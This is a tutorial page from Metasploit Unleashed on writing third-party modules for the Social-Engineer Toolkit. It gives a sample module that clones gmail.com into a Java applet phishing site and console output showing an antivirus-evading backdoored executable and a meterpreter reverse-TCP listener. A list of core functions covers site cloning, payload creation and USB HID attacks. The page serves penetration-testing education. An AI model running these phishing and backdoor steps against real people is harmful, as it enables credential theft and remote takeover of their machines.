SET Module Development
From Metasploit Unleashed
In version 1.2 introduced the core library modules and the ability to add third party modules into SET. Essentially, the folder located in the SET root “modules” can add additions or enhancements to SET and add additional contributions to the toolkit. The first thing to note is that when you add a new “.py” file to the modules directory, it will automatically be imported into SET under “Third Party Modules”. Below is an example of a test module:
#
# These are required fields
#
import sys
# switch over to import core
sys.path.append("src/core")
# import the core modules
try: reload(core)
except: import core
MAIN="This is a test module"
AUTHOR="Dave ‘ReL1K’ davek@social-engineer.org"
# def main(): header is required
def main():
core.java_applet_attack("https://gmail.com","443","reports/")
pause=raw_input("This module has finished completing. Press to continue")
In this example, we create a simple module that will use the java applet attack vector, clone a website and launch the attack for us. It handles creating the Metasploit payloads and everything for us. Ultimately you can create whatever you want to using the function calls built into SET or creating your own. Now if we run SET:
root@bt:/pentest/exploits/set# ./set ..######..########.######## .##....##.##..........##... .##.......##..........##... ..######..######......##... .......##.##..........##... .##....##.##..........##... ..######..########....##... Welcome to the Social-Engineer Toolkit (SET). Your one stop shop for all of your social-engineering needs.. DerbyCon 2011 Sep30-Oct02 - http://www.derbycon.com Select from the menu: 1. Spear-Phishing Attack Vectors 2. Website Attack Vectors 3. Infectious Media Generator 4. Create a Payload and Listener 5. Mass Mailer Attack 6. Teensy USB HID Attack Vector 7. SMS Spoofing Attack Vector 8. Third Party Modules 9. Update the Metasploit Framework 10. Update the Social-Engineer Toolkit 11. Help, Credits, and About 12. Exit the Social-Engineer Toolkit Enter your choice: 8 Welcome to the Social-Engineer Toolkit Third Party Modules menu. Please read the readme/modules.txt for more information on how to create your own modules. 1. This is a test module 2. Return to the previous menu. Enter the module you want to use: 1 [-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds... [-] Backdoor completed successfully. Payload is now hidden within a legit executable. [*] UPX Encoding is set to ON, attempting to pack the executable with UPX encoding. [*] Digital Signature Stealing is ON, hijacking a legit digital certificate. [*] Executable created under src/program_junk/ajk1K7Wl.exe [*] Cloning the website: https://gmail.com [*] This could take a little bit... [*] Injecting Java Applet attack into the newly cloned website. [*] Filename obfuscation complete. Payload name is: m3LrpBcbjm13u [*] Malicious java applet website prepped for deployment Site has been successfully cloned and is: reports/ [*] Starting the multi/handler through Metasploit... o 8 o o 8 8 8 ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P 8' 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8 8 8 8 8. 8 8 8 'Yb. 8 8 8 8 8 8 8 8 8 8 `Yooo' 8 `YooP8 `YooP' 8YooP' 8 `YooP' 8 8 ..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..: ::::::::::::::::::::::::::::::::::8::::::::::::::::::::::: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::: =[ metasploit v3.6.0-dev [core:3.6 api:1.0] + -- --=[ 644 exploits - 328 auxiliary + -- --=[ 216 payloads - 27 encoders - 8 nops =[ svn r11638 updated today (2011.01.25) resource (/pentest/exploits/set/src/program_junk/msf_answerfile)> use multi/handler resource (/pentest/exploits/set/src/program_junk/msf_answerfile)> set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp resource (/pentest/exploits/set/src/program_junk/msf_answerfile)> set LHOST 0.0.0.0 LHOST => 0.0.0.0 resource (/pentest/exploits/set/src/program_junk/msf_answerfile)> set LPORT 443 LPORT => 443 resource (/pentest/exploits/set/src/program_junk/msf_answerfile)> exploit -j [*] Exploit running as background job. [*] Started reverse handler on 0.0.0.0:443 [*] Starting the payload handler... msf exploit(handler) > msf exploit(handler) > msf exploit(handler) > exit This module has finished completing. Pressto continue
- core.meta_path() # Returns the path of the Metasploit directory in the set_config
- core.grab_ipaddress() # Returns your IP address used for the attacks
- core.check_pexpect() # Checks to see if the Python module PEXPECT is installed
- core.check_beautifulsoup() # Check to see if the Python module BeautifulSoup is installed
- core.cleanup_routine() # Removed stale process information, files, etc.
- core.update_metasploit() # Updates the Metasploit framework
- core.update_set() # Updates the Social-Engineer Toolkit
- core.help_menu() # Displays the help menu
- core.date_time() # Displays the date and time
- core.generate_random_string(low,high) # generates a number between the low and high range (random). So you could use generate_random_string(1,30) and it will create a unique string between 1 and 30 characters long
- core.site_cloner(website,exportpath, *args) # clones a website and exports it to a specific path. So for example you could use core.site_cloner(“https://gmail.com”,”reports/”) and it will clone the website and export it to the reports directory.
- core.meterpreter_reverse_tcp_exe(port) # creates a meterpreter reverse payload, only need to specify port.
- core.metasploit_listener_start(payload,port) # creates a meterpreter listener, only need to specify payload (example windows/meterpreter/reverse_tcp) and port.
- core.start_web_server(directory) # Starts a web server in the directory root you specify, for example core.start_web_server(“reports”)
- core.java_applet_attack(website,port,directory) # Clones a website, creates meterpreter backdoor, starts a webserver and creates the listener. The port is the meterpreter reverse listener port. Example core.java_applet_attack(“https://gmail.com”,”443”,”reports/”)
- core.teensy_pde_generator(attack_method) # Creates a teensy pde file you can use for the teensy USB HID attack vector. You can call the following attack methods: beef, powershell_down, powershell_reverse, java_applet, and wscript. Example: teensy_pde_generator(“powershell_reverse”)
Beyond Metasploit > Social-Engineering Toolkit (SET) > SET Module Development
Getting Started | Menu Based Driving | Spear-Phishing Attack | Java Applet Attack | Metaspoit Browser Exploit | Credential Harvester Attack | Tabnabbing Attack | Man Left In The Middle Attack | Web Jacking Attack | Multi-Attack Web Vector | Infectious Media Generator | Teensy USB HID Attack | SMS Spoofing Attack | SET Automation | SET Web-Interface | SET Module Development | SET FAQ
